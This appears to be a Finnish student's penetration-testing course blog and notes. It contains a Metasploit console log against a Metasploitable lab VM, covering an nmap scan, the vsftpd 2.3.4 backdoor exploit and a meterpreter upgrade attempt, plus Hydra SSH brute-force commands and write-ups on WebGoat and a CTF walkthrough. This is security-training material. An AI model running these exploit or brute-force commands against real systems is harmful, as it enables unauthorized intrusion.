[*] 172.28.128.3 - Command shell session 1 closed. Reason: User exit
msf5 post(multi/manage/shell_to_meterpreter) > sessions 1
[-] Invalid session identifier: 1
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
No active sessions.
msf5 post(multi/manage/shell_to_meterpreter) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > set RHOSTS 172.28.128.3
RHOSTS => 172.28.128.3
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
No active sessions.
msf5 post(multi/manage/shell_to_meterpreter) > db_nmap -sV -n 172.28.128.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-24 11:21 UTC
[*] Nmap: Nmap scan report for 172.28.128.3
[*] Nmap: Host is up (0.00025s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login
[*] Nmap: 514/tcp open shell Netkit rshd
[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open bindshell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)
[*] Nmap: 6000/tcp open X11 (access denied)
[*] Nmap: 6667/tcp open irc UnrealIRCd
[*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
[*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: MAC Address: 08:00:27:36:26:90 (Oracle VirtualBox virtual NIC)
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
msf5 post(multi/manage/shell_to_meterpreter) > set RHOSTS 172.28.128.3
RHOSTS => 172.28.128.3
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
No active sessions.
msf5 post(multi/manage/shell_to_meterpreter) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
msf5 post(multi/manage/shell_to_meterpreter) > sessons 1
[-] Unknown command: sessons.
msf5 post(multi/manage/shell_to_meterpreter) > session 1
[-] Unknown command: session.
msf5 post(multi/manage/shell_to_meterpreter) > history
2 db_nmap -h
3 db_nmap
4 db_nmap -sV -n 10.10.10.140
5 db_nmap -sV -n -Pn 10.10.10.140
6 db_nmap -sS -n -Pn 10.10.10.140
7 db_nmap -sS -n -Pn 10.10.10.1-40
8 services --up -p 80,443
9 services
10 db_nmap -sV 10.10.10.1-50 -n -p 80,443 -vvv
11 services
12 db_nmap -sV 10.10.10.1-50 -n -p 80,443 -vvv
13 db_nmap -sV 10.10.10.100-110 -n -p 80,443 -vvv
14 services
15 exit
16 db_nmap -sV 10.10.10.100-110 -n -p 80,443 -vvv
17 services
18 services -p 80,443
19 services -p 80,443 -R --up
20 services -p 80,443 --up -R
21 back
22 exit
23 services -p 80,443 --up -R
24 nmap -sV -n -vvv 178.28.128.4
25 nmap -sV -n -vvv -Pn 178.28.128.4
26 nmap -sV -n -vvv 178.28.128.0-30
27 services --up
28 nmap -sn -n -vvv 178.28.128.0-255
29 db_nmap -sn -n -vvv 178.28.128.0-255178.28.128.4178.28.128.4178.28.128.4178.28.128.4178.28.128.4178.28.128.4178.28.128.4178.28.128.4
30 services -up
31 services --up
32 db_nmap -n 172.28.128.1
33 db_nmap -n 172.28.128.1 -R
34 set RHOSTS 172.28.128.1
35 help
36 clear172.28.128.1
37 clear
38 set RHOSTS 172.28.128.1
39 search vsf
40 spool
41 msf exploit(vsftpd_234_backdoor)
42 exploit(vsftpd_234_backdoor)
43 use exploit(vsftpd_234_backdoor)
44 use exploit/unix/ftp/vsftpd_234_backdoor
45 info
46 help
47 chck
48 check
49 exploit
50 info
51 help
52 show options
53 sessions -l
54 ls
55 show options
56 exploit
57 back
58 db_nmap -n 172.28.128.1 -R
59 db_nmap -n 172.28.128.0-254 -R
60 set RHOSTS 172.28.128.0-254
61 search vsf
62 use exploit(vsftpd_234_backdoor)
63 use exploit/unix/ftp/vsftpd_234_backdoor
64 show options
65 set RHOSTS 172.28.128.0-254
66 exploit
67 services --up
68 db_nmap -sV -n 172.28.128.3
69 exploit
70 set RHOSTS 172.28.128.3
71 exploit
72 exit
73 sessions
74 sessions 1
75 search upgrade
76 use post/multi/manage/shell_to_meterpreter
77 options
78 LHOST
79 use LHOST
80 options
81 LHOST ip
82 help
83 run LHOST
84 use post/multi/manage/shell_to_meterpreter
85 sessions
86 options
87 exploit
88 sessions
89 exploit
90 sessions 1
91 sessions
92 use post/multi/manage/shell_to_meterpreter
93 set RHOSTS 172.28.128.3
94 sessions
95 db_nmap -sV -n 172.28.128.3
96 set RHOSTS 172.28.128.3
97 sessions
98 exploit
99 sessons 1
100 session 1
101 history
---
hashcat
echo -n ‘mikaela’|md5sum
-> saa hashattyn ‘mikaela’
---
banner grabbing
----
luo filu jossa oletettuja käyttiksiä ja filu jossa oletettuja passuja,
lisää osoite jonne haluat mennä
hashcat pääsy toiselle koneelle ip:n mukaan
118 ls
119 nano passwords
120 cat passwords
121 hydra -l mikaela -P passwords
122 ls
123 pwd
124 hydra -l mikaela -P passwords
125 ssh topi@172.28.171.136
126 hydra -l mikaela -P passwords ssh//:172.28.171.136
127 hydra -l mikaela -P passwords ssh://172.28.171.136
128 hydra -l mikaela -P passwords ssh//:172.28.171.136 -t 4
129 hydra -l topi -P passwords ssh://172.28.171.136
130 hydra -l topi -P passwords ssh//:172.28.171.136 -t 4
131 hydra -l topi -P passwords ssh//:172.28.171.136
132 hydra -l topi -P passwords ssh://172.28.171.136
133 ls
134 nano passwords
135 cat passwords
136 hydra -l topi -P passwords ssh://172.28.171.136
137 exit
---
netcat - metsploit framework
searchssploit
Author: Mikaela Hallenberg
Penetration Testing – Tunkeutumistestaus
H2
a) Testaamani tehtävä oli WebGoatin “Challenge” -osio, jossa testasin ensimmäistä tehtävää. Onnistuin pikaisen spurttini aikana löytämään login-kentän käyttäjätunnuksen, joka oli löydettävissä tarkastelemalla POST kutsua, joka lähetetään submit -napin klikistä. Tarkastelemalla POST kutsua, voi huomata kentän user, jonka arvo kiinnittää huomion. Selviää, että kyseessä on base64 salattu koodi ja salauksen purkamisen jälkeen ilmeisen selkokielinen käyttäjätunnus. Ei tietenkään ole sopivaa tässä blogissa paljastaa mikä se tosiasiassa on 😉
b) Valitsin MITRE Att&ck -taktiikoista Access Token Manipulation -taktiikan, sillä se soveltuu mielestäni hyvin verkkosovelluksen haavoittuvuuksien etsimiseen. Tosin, kuvausta lukiessani, luulen, että olen ymmärtänyt tämän eri tavalla. Itse ymmärrän tämän taktiikan niin, että http-kutsun, joka siis pyytää/saa access tokenin, väliin mennään ja muutetaan sitä, joten itseasiassa valitsemani taktiikka taitaa sittenkin olla välimieshyökkäys. Mitren kuvauksessa puhutaan valheellisen tokenin luomisesta tai varastamisesta, prosessin aloittamisesta tokenilla ja samankaltaisen tokenin luomisesta haittakäyttöön, mutta konteksti vaikuttaa olevan Windows API, eikä esim. verkkosovelluksesta kutsuttavasta rajapinnasta.
Tehtävän lähteet:
Penetration Testing – Tunkeutumistestaus, Intensive Summer Course 2019
h1:
1a) Kirjoitin Youtubeen “Capture the Flag Walkthrough” ja ensimmäisiä videoita hakutuloksista oli lopulta valitsemani video, jossa käytettiin itselleni täysin uusia työkaluja kuten nmap. Walkthrough:ssa worpressiin lisättiin haitallinen liitännäinen, joka kaappaa käyttäjän session, ajaa unix-privesc-check -skriptin joka etsii tiedostoja, joissa on käyttöoikeuksien kannalta haavoittuvuuksia. Haavoittuvuudet löytämällä videossa tehtiin käyttöoikeuksien korotus (privilege escalation hyökkäys). En kokeillut näistä vielä mitään, mutta olen kiinnostunut testaamaan tämäntyyppistä harjoitusta itsekin.
1b) Kali Linux Live USB -tikun lataus onnistui toisena kurssipäivänä. Googlasin ohjeet, jotka auttoivat huomattavasti tämän ollessa itselleni uusi asia. Luulin ensin, että tiedoston simppeli kopioiminen on riittävä tapa, mutta jutellessani kurssitoverin kanssa selvisi asian todellinen luonto. Käytin komentoa sudo dd if=kali-linux-xfce-2019.1a-amd64.iso of=/dev/sdf bs=512k. Käytin normaalia USB3 tikkua.
Tehtävänannon lähde:
The Journey Begins
Thanks for joining me!
Good company in a journey makes the way seem shorter. — Izaak Walton
